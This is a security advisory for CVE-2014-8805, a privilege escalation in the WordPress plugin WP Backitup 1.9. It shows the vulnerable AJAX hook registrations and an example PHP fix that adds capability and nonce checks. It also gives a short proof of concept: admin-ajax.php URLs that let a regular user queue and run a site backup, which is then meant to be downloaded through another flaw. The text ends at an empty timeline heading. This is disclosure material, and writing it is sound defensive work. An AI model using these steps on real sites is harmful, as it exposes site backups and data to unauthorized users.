WP Backitup 1.9 Privilege Escalation

Homepage:

https://wordpress.org/plugins/wp-backitup

CVE-ID

CVE-2014-8805

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

A regular user (an account created via wp-login.php?action=register) can run the backup functionality, because the plugin registers its AJAX handlers for any logged-in user:

File: wp-backitup\lib\includes\class-wpbackitup-admin.php

add_action('wp_ajax_wp-backitup_backup', array( &$this, 'ajax_backup' ));
add_action('wp_ajax_wp-backitup_backup_status_reader', array( &$this,'ajax_get_backup_status'));
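As an added example that is not the plugin's own code, this is how handlers registered on wp_ajax_ hooks should be gated so that only users holding an administrative capability (and a valid nonce) can queue or advance a backup. The class name, the method bodies and the nonce action name are assumptions.

```php
<?php
// Added example (not the plugin's code): gate wp_ajax_ backup handlers on
// capability and nonce. Class name, bodies and nonce action are assumed.

class WPBackItUp_Admin_Example {

    public function __construct() {
        // wp_ajax_* hooks fire for every authenticated user, including
        // subscribers, so the handler itself must enforce authorization.
        add_action('wp_ajax_wp-backitup_backup', array($this, 'ajax_backup'));
        add_action('wp_ajax_wp-backitup_backup_status_reader', array($this, 'ajax_get_backup_status'));
    }

    // Shared guard: require an administrator-level capability, then a valid
    // nonce, so neither a low-privileged account nor a forged cross-site
    // request can start or step a backup. Both failure paths terminate.
    private function authorize_backup_request() {
        if (!current_user_can('manage_options')) {
            status_header(403);
            wp_send_json_error(array('message' => 'Insufficient privileges'));
        }
        // 'wp-backitup-nonce' is an assumed action name; the admin page that
        // issues the request must embed a nonce created for the same action.
        check_ajax_referer('wp-backitup-nonce', 'nonce');
    }

    public function ajax_backup() {
        $this->authorize_backup_request();
        // Backup queuing is plugin-specific and omitted here.
        wp_send_json_success(array('status' => 'queued'));
    }

    public function ajax_get_backup_status() {
        $this->authorize_backup_request();
        // Stepping/reporting the backup is plugin-specific and omitted here.
        wp_send_json_success(array('status' => 'running'));
    }
}
```

With the guard in place, the admin-ajax.php requests described below return 403 for a subscriber account instead of starting a backup.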

Proof of Concept:

Log in as a regular user, then queue a backup:

http://wordpress-instalation/wp-admin/admin-ajax.php?action=wp-backitup_backup

After that you can start the queued backup (you must request this link several times, because the backup runs in several steps):

http://wordpress-instalation/wp-admin/admin-ajax.php?action=wp-backitup_backup_status_reader

You can then download the backup using the Disclosure of Potentially Sensitive Information vulnerability.

Timeline: